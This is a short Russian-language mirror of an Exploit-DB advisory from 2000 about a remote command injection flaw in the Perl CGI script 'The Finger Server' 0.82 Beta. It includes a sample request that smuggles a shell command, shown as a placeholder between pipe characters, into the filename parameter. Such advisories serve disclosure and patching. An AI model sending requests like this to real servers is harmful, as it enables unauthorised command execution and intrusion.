- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 19745
- Проверка EDB
-
- Пройдено
- Автор
- IAIN WADE
- Тип уязвимости
- REMOTE
- Платформа
- CGI
- CVE
- cve-2000-0128
- Дата публикации
- 2000-02-04
Daniel Beckham The Finger Server 0.82 Beta - Pipe
Код:
source: https://www.securityfocus.com/bid/974/info
'The Finger Server' is a perl script for providing .plan-like functionality through a website. Due to insufficient input checking it is possible for remote unauthenticated users to execute shell commands on the server which will run with the priveleges of the webserver.
A request like:
http ://target/finger.cgi?action=archives&cmd=specific
&filename=99.10.28.15.23.username.|<shell command>|
(split for readability)
will cause the server to execute whatever command is specified.- Источник
- www.exploit-db.com
